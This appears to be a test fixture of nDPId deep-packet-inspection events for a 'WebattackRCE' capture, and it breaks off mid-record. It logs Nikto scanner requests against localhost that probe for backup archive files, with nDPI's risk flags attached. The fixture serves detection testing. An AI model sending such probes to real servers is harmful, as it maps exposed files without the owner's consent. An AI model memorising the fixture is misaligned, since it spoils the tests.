+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277232,"flow_last_seen":1576420277232,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277232,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50246,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_packet_id":1,"flow_last_seen":1576420277232,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277232,"pkt":"AAAAAAAAAAAAAAAACABFAADB9\/xAAEAGRDh\/AAABfwAAAcRGH5CWhs9n6ph7xIAYAED+tQAAAQEICp1m\/RidZv0YR0VUIC8xMjcuMC50YXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277232,"flow_last_seen":1576420277232,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277232,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50246,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277233,"flow_last_seen":1576420277233,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277233,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50248,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_packet_id":1,"flow_last_seen":1576420277233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277233,"pkt":"AAAAAAAAAAAAAAAACABFAADB+aZAAEAGQo5\/AAABfwAAAcRIH5BuH8E5NSGMTIAYAED+tQAAAQEICp1m\/RmdZv0ZR0VUIC8xMjcuMC50YXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":352,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277233,"flow_last_seen":1576420277233,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277233,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50248,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":353,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277235,"flow_last_seen":1576420277235,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277235,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50250,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_packet_id":1,"flow_last_seen":1576420277235,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277235,"pkt":"AAAAAAAAAAAAAAAACABFAADF6elAAEAGUkd\/AAABfwAAAcRKH5Ao6tF83Ul6FYAYAED+uQAAAQEICp1m\/RudZv0aR0VUIC9iYWNrdXAudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277235,"flow_last_seen":1576420277235,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277235,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50250,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":354,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277236,"flow_last_seen":1576420277236,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277236,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50252,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_packet_id":1,"flow_last_seen":1576420277236,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277236,"pkt":"AAAAAAAAAAAAAAAACABFAADFYRdAAEAG2xl\/AAABfwAAAcRMH5CsR1mJC42rtYAYAED+uQAAAQEICp1m\/RydZv0cR0VUIC9iYWNrdXAudGFyLmd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":354,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277236,"flow_last_seen":1576420277236,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277236,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50252,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277237,"flow_last_seen":1576420277237,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277237,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50254,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":1,"flow_last_seen":1576420277237,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277237,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/lsZAAEAGpXB\/AAABfwAAAcROH5CjIq5axoK2IoAYAED+swAAAQEICp1m\/R2dZv0dR0VUIC8xMjcuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} 
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":355,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277237,"flow_last_seen":1576420277237,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277237,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50254,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":356,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277239,"flow_last_seen":1576420277239,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277239,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50256,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":356,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_packet_id":1,"flow_last_seen":1576420277239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277239,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/HMpAAEAGH21\/AAABfwAAAcRQH5BQEyRWh8Tqd4AYAED+swAAAQEICp1m\/R+dZv0eR0VUIC8xMjcuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":356,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277239,"flow_last_seen":1576420277239,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277239,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50256,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":357,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277240,"flow_last_seen":1576420277240,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277240,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50258,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_packet_id":1,"flow_last_seen":1576420277240,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277240,"pkt":"AAAAAAAAAAAAAAAACABFAADGqKRAAEAGk4t\/AAABfwAAAcRSH5A2yZA9R5wqAoAYAED+ugAAAQEICp1m\/SCdZv0gR0VUIC9iYWNrdXAudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277240,"flow_last_seen":1576420277240,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277240,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50258,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277242,"flow_last_seen":1576420277242,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277242,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50260,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_packet_id":1,"flow_last_seen":1576420277242,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277242,"pkt":"AAAAAAAAAAAAAAAACABFAADGoOxAAEAGm0N\/AAABfwAAAcRUH5C09Jh1W5zr34AYAED+ugAAAQEICp1m\/SKdZv0iR0VUIC9iYWNrdXAudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} 
+01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277242,"flow_last_seen":1576420277242,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277242,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50260,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277243,"flow_last_seen":1576420277243,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50262,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":1,"flow_last_seen":1576420277243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277243,"pkt":"AAAAAAAAAAAAAAAACABFAADIi9VAAEAGsFh\/AAABfwAAAcRWH5DRYLNOcO51UIAYAED+vAAAAQEICp1m\/SOdZv0jR0VUIC8xMjcuMC4wLjEudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277243,"flow_last_seen":1576420277243,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50262,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":360,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277244,"flow_last_seen":1576420277244,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277244,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50264,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":1,"flow_last_seen":1576420277244,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277244,"pkt":"AAAAAAAAAAAAAAAACABFAADIKHJAAEAGE7x\/AAABfwAAAcRYH5BlBxDwgejT24AYAED+vAAAAQEICp1m\/SSdZv0kR0VUIC8xMjcuMC4wLjEudGFyLmd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":360,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277244,"flow_last_seen":1576420277244,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277244,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50264,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":361,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277246,"flow_last_seen":1576420277246,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277246,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50266,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":1,"flow_last_seen":1576420277246,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277246,"pkt":"AAAAAAAAAAAAAAAACABFAADF\/A9AAEAGQCF\/AAABfwAAAcRaH5B2IcSTgB9qe4AYAED+uQAAAQEICp1m\/SWdZv0lR0VUIC8xMjdfMF8wXzEud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277246,"flow_last_seen":1576420277246,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277246,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50266,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 